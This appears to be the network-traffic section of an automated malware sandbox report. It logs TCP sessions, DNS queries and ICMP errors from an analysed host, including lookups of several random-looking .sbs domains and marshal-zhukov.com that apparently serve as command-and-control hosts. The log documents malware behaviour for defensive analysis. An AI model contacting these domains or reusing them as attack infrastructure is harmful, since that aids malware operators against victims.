                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.451766968 CET4435007813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.452296019 CET50078443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.452317953 CET4435007813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.452743053 CET50078443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.452749014 CET4435007813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.682586908 CET4435007913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.683476925 CET50079443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.683495045 CET4435007913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.684103966 CET50079443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.684112072 CET4435007913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.874295950 CET4435007713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.874325037 CET4435007713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.874340057 CET4435007713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.874417067 CET50077443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.874437094 CET4435007713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.874485016 CET50077443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.901042938 CET4435007813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.901077986 CET4435007813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.901132107 CET50078443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.901148081 CET4435007813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.901189089 CET50078443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.901770115 CET50078443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.901777029 CET4435007813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.901833057 CET50078443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.902007103 CET4435007813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.902051926 CET4435007813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.902112961 CET50078443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.905380011 CET50082443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.905468941 CET4435008213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.906729937 CET50082443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.907342911 CET50082443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:22.907377005 CET4435008213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.065588951 CET4435007713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.065639019 CET4435007713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.065681934 CET50077443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.065690041 CET4435007713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.065718889 CET50077443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.065742970 CET50077443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.066046953 CET50077443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.066061974 CET4435007713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.066073895 CET50077443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.066080093 CET4435007713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.070650101 CET50083443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.070693016 CET4435008313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.070775986 CET50083443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.070950985 CET50083443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.070964098 CET4435008313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.144511938 CET4435007913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.144541979 CET4435007913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.144603014 CET50079443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.144625902 CET4435007913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.144818068 CET50079443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.144830942 CET4435007913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.144839048 CET50079443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.144989967 CET4435007913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.145016909 CET4435007913.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.145076036 CET50079443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.147397995 CET50084443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.147459030 CET4435008413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.148976088 CET50084443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.149281025 CET50084443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.149302006 CET4435008413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.497419119 CET4435008013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.501404047 CET50080443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.501436949 CET4435008013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.501872063 CET50080443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.501878977 CET4435008013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.640261889 CET4435008113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.640822887 CET50081443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.640852928 CET4435008113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.641334057 CET50081443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.641340017 CET4435008113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.943808079 CET4435008013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.946804047 CET4435008013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.946871996 CET50080443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.946918011 CET50080443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.946939945 CET4435008013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.946952105 CET50080443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.946958065 CET4435008013.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.950109959 CET50085443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.950144053 CET4435008513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.950226068 CET50085443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.950414896 CET50085443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:23.950429916 CET4435008513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.098808050 CET4435008113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.098887920 CET4435008113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.098938942 CET50081443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.099186897 CET50081443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.099200010 CET4435008113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.099215984 CET50081443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.099221945 CET4435008113.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.101986885 CET50086443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.102034092 CET4435008613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.102082014 CET50086443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.102531910 CET50086443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.102543116 CET4435008613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.693567038 CET4435008213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.694264889 CET50082443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.694334984 CET4435008213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.694710970 CET50082443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.694726944 CET4435008213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.924220085 CET4435008313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.925097942 CET50083443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.925136089 CET4435008313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.926049948 CET50083443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.926060915 CET4435008313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.940555096 CET4435008413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.941015959 CET50084443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.941046000 CET4435008413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.941488028 CET50084443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:24.941503048 CET4435008413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.139570951 CET4435008213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.142731905 CET4435008213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.142937899 CET50082443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.143012047 CET50082443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.143058062 CET4435008213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.143086910 CET50082443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.143102884 CET4435008213.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.145651102 CET50087443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.145690918 CET4435008713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.145773888 CET50087443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.146059036 CET50087443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.146069050 CET4435008713.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.386492968 CET4435008313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.386571884 CET4435008313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.387304068 CET50083443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.387358904 CET50083443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.387358904 CET50083443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.387381077 CET4435008313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.387396097 CET4435008313.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.388073921 CET4435008413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.388102055 CET4435008413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.388165951 CET50084443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.388183117 CET4435008413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.388272047 CET50084443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.388355970 CET50084443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.388355970 CET50084443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.388372898 CET4435008413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.388382912 CET4435008413.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.390607119 CET50088443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.390641928 CET4435008813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.390875101 CET50088443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.391009092 CET50088443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.391020060 CET4435008813.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.737132072 CET4435008513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.737801075 CET50085443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.737828016 CET4435008513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.738250971 CET50085443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.738257885 CET4435008513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.745810986 CET4435008613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.746742964 CET50086443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.746769905 CET4435008613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.747358084 CET50086443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:25.747364044 CET4435008613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:26.181329966 CET4435008513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:26.184413910 CET4435008513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:26.184577942 CET50085443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:26.184642076 CET50085443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:26.184667110 CET4435008513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:26.184683084 CET50085443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:26.184690952 CET4435008513.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:26.201791048 CET4435008613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:26.202156067 CET4435008613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:26.202229977 CET50086443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:26.202318907 CET50086443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:26.202342033 CET4435008613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:26.202356100 CET50086443192.168.2.1013.107.246.43
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:26.202362061 CET4435008613.107.246.43192.168.2.10
                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:18.043771029 CET5711753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:18.270955086 CET53571171.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:18.273612976 CET5225153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:18.512129068 CET53522511.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:18.514044046 CET5213953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:18.749067068 CET53521391.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:18.751542091 CET5532853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:19.099014997 CET53553281.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:19.100815058 CET6047653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:19.383721113 CET53604761.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:19.456494093 CET5072753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:19.683329105 CET53507271.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:19.685730934 CET6307253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:19.936086893 CET53630721.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:19.938235044 CET5847753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.289120913 CET53584771.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.292124987 CET5304253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.748370886 CET53530421.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.750916958 CET5471853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.888709068 CET53547181.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.452892065 CET5945853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.676861048 CET53594581.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:10.823467016 CET53566881.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:10.853451014 CET53571701.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:13.710916996 CET53613481.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:14.755218983 CET138138192.168.2.10192.168.2.255
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:15.292366982 CET6393853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:15.292526960 CET5124553192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:15.429943085 CET53512451.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:15.429960966 CET53639381.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:17.216947079 CET5909853192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:17.217109919 CET5434453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:20.444396019 CET5454653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:20.444616079 CET5400953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:25.548202038 CET53547441.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:27.584891081 CET4946953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:27.585036993 CET5817153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:30.955930948 CET53523011.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:49.628241062 CET53649231.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:10.738688946 CET53560161.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              Nov 27, 2024 16:33:12.693211079 CET53602831.1.1.1192.168.2.10
                                                                                                                                                                                                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:10.948827028 CET192.168.2.101.1.1.1c239(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:20.701320887 CET192.168.2.101.1.1.1c2ba(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:28.008477926 CET192.168.2.101.1.1.1c27b(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:40.097755909 CET192.168.2.101.1.1.1c26a(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:18.043771029 CET192.168.2.101.1.1.10xad77Standard query (0)property-imper.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:18.273612976 CET192.168.2.101.1.1.10x54a2Standard query (0)frogs-severz.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:18.514044046 CET192.168.2.101.1.1.10xd6bdStandard query (0)occupy-blushi.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:18.751542091 CET192.168.2.101.1.1.10x17f6Standard query (0)blade-govern.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:19.100815058 CET192.168.2.101.1.1.10xa154Standard query (0)story-tense-faz.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:19.456494093 CET192.168.2.101.1.1.10xffa5Standard query (0)leg-sate-boat.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:19.685730934 CET192.168.2.101.1.1.10x8090Standard query (0)disobey-curly.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:19.938235044 CET192.168.2.101.1.1.10xf5feStandard query (0)motion-treesz.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.292124987 CET192.168.2.101.1.1.10xf4ccStandard query (0)powerful-avoids.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.750916958 CET192.168.2.101.1.1.10xbdbcStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.452892065 CET192.168.2.101.1.1.10x91f3Standard query (0)marshal-zhukov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:15.292366982 CET192.168.2.101.1.1.10xa957Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:15.292526960 CET192.168.2.101.1.1.10x1db2Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:17.216947079 CET192.168.2.101.1.1.10x40b3Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:17.217109919 CET192.168.2.101.1.1.10x393Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:20.444396019 CET192.168.2.101.1.1.10x112eStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:20.444616079 CET192.168.2.101.1.1.10x54ebStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:27.584891081 CET192.168.2.101.1.1.10xac17Standard query (0)mdec.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:27.585036993 CET192.168.2.101.1.1.10xf935Standard query (0)mdec.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:18.270955086 CET1.1.1.1192.168.2.100xad77Name error (3)property-imper.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:18.512129068 CET1.1.1.1192.168.2.100x54a2Name error (3)frogs-severz.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:18.749067068 CET1.1.1.1192.168.2.100xd6bdName error (3)occupy-blushi.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:19.099014997 CET1.1.1.1192.168.2.100x17f6Name error (3)blade-govern.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:19.383721113 CET1.1.1.1192.168.2.100xa154Name error (3)story-tense-faz.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:19.683329105 CET1.1.1.1192.168.2.100xffa5Name error (3)leg-sate-boat.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:19.936086893 CET1.1.1.1192.168.2.100x8090Name error (3)disobey-curly.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.289120913 CET1.1.1.1192.168.2.100xf5feName error (3)motion-treesz.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.748370886 CET1.1.1.1192.168.2.100xf4ccName error (3)powerful-avoids.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:20.888709068 CET1.1.1.1192.168.2.100xbdbcNo error (0)steamcommunity.com104.121.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.676861048 CET1.1.1.1192.168.2.100x91f3No error (0)marshal-zhukov.com172.67.160.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:31:23.676861048 CET1.1.1.1192.168.2.100x91f3No error (0)marshal-zhukov.com104.21.82.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Nov 27, 2024 16:32:15.429943085 CET1.1.1.1192.168.2.100x1db2No error (0)www.google.com65IN (0x0001)false
